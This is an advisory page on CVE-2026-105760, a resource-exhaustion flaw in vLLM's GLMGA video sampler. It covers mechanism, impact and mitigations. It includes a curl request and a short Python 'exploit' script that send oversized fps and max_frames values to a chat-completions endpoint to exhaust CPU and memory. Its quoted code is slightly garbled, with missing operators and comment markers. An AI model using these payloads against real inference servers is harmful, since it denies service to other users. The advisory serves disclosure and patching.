vLLM, Resource Exhaustion via GLMGA Video Sampling, CVE-2026-105760 (Medium) -DC-Oct2026-2746

Listen to this Post

CVE-2026-105760 is a resource exhaustion vulnerability in vLLM, an inference and serving engine for large language models. The vulnerability exists in the OpenAI-compatible chat completions endpoint, which accepts request-level video loader options through the `media_io_kwargs` field. A remote caller can select the GLMGA video backend and supply arbitrarily large values for the `fps` and `max_frames` options without any strict work ceiling being enforced by the application.
The core mechanism of the vulnerability lies in how the GLMGA sampler processes these request-controlled values. When a chat completion request includes a video and specifies `video_backend: “glmga”` along with high `fps` and `max_frames` values, GLMGA calculates extract_t = min(int(duration fps), max_frames). It then constructs a Python list containing exactly that many entries and subsequently deduplicates this list before any frame decoding occurs. This means that even when the supplied video contains only two frames, the system will attempt to allocate and process an intermediate list sized according to the attacker-supplied numeric values.
The critical technical flaw is the absence of validation on the computed candidate count before list construction. The deduplication step reduces the final set of frame indices to match the actual video content, but the resource consumption has already occurred during the construction and deduplication of the oversized intermediate list. This work takes place in the shared media-loading executor, which is responsible for handling media requests across multiple concurrent users of the inference engine.
Because vLLM operates as a shared service, the disproportionate CPU time and memory consumption directly impacts other workloads running on the same instance. An attacker can submit a compact JSON request containing a tiny valid video and extreme sampling parameters, causing thread pool saturation, increased latency for legitimate requests, and potentially complete unavailability of the inference service if resources are fully depleted. The vulnerability is classified under CWE-400 (Uncontrolled Resource Consumption) and CWE-770 (Allocation of Resources Without Limits or Throttling).
The attack surface is reachable without authentication when no API key is configured. When API-key authentication is enabled, any caller holding a valid key can reach the same vulnerable code path. The model does not need to use GLMGA by default because the request-level value overrides the model’s configured loader mapping, and the proof of concept explicitly selects the OpenCV decoder, requiring no external media host or GPU decoder. The demonstrated impact is partial denial of service; no memory corruption, data disclosure, or code execution is claimed.

DailyCVE Form:

Platform: vLLM
Version: < 0.30.0
Vulnerability: Resource Exhaustion
Severity: Medium
date: 2026-10-05

Prediction: 2026-10-15

What Undercode Say:

curl -X POST http://localhost:8000/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "your-video-model",
"messages": [
{
"role": "user",
"content": [
{"type": "text", "text": "Describe this video."},
{"type": "video_url", "video_url": {"url": "data:video/mp4;base64,AAAAIGZ0eXBpc29tAAACAGlzb21pc28yYXZjMW1wNDEAAAAIZnJlZQAAAQxtZGF0..."}}
]
}
],
"media_io_kwargs": {
"video": {
"video_backend": "glmga",
"backend": "opencv",
"fps": 500000,
"max_frames": 500000
}
}
}'
Vulnerable code path in video.py (simplified)
def glmga_sample(video_path, fps, max_frames):
duration = get_video_duration(video_path)
extract_t = min(int(duration fps), max_frames) attacker-controlled size
indices = list(range(extract_t)) O(extract_t) list construction
unique_indices = list(set(indices)) O(extract_t) deduplication
only then does decoding occur for the tiny actual frame set
return unique_indices

Exploit: (Educational Purposes!)

import requests, base64
tiny_video_b64 = "AAAAIGZ0eXBpc29t..." two-frame MP4
payload = {
"model": "video-model",
"messages": [{
"role": "user",
"content": [
{"type": "text", "text": "analyze"},
{"type": "video_url", "video_url": {
"url": f"data:video/mp4;base64,{tiny_video_b64}"
}}
]
}],
"media_io_kwargs": {
"video": {
"video_backend": "glmga",
"backend": "opencv",
"fps": 1000000,
"max_frames": 1000000
}
}
}
requests.post("http://target:8000/v1/chat/completions", json=payload)

Protection:

Upgrade to vLLM version 0.30.0 or later, which implements appropriate ceilings for the `fps` and `max_frames` parameters. If immediate upgrading is not feasible, enforce strict validation limits at the application layer before request processing begins. Remove or filter request-level video_backend, fps, and `max_frames` options at the API gateway. Do not allow untrusted callers to select the GLMGA backend. Apply authentication, rate limiting, request concurrency limits, and process memory isolation. Deploy resource quotas at the container or process level to cap total CPU and memory consumption per request or user session. Avoid constructing O(extract_t) intermediate Python lists by generating bounded unique frame indices directly from the source frame count and output-frame limit.

Impact:

Partial denial of service through CPU and memory exhaustion. The shared media-loading executor can become saturated, causing increased latency for legitimate users and potentially complete unavailability of the inference service. The vulnerability aligns with MITRE ATT&CK technique T1499 (Endpoint Denial of Service) and facilitates resource hijacking through crafted API requests. No memory corruption, data disclosure, or code execution is possible.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top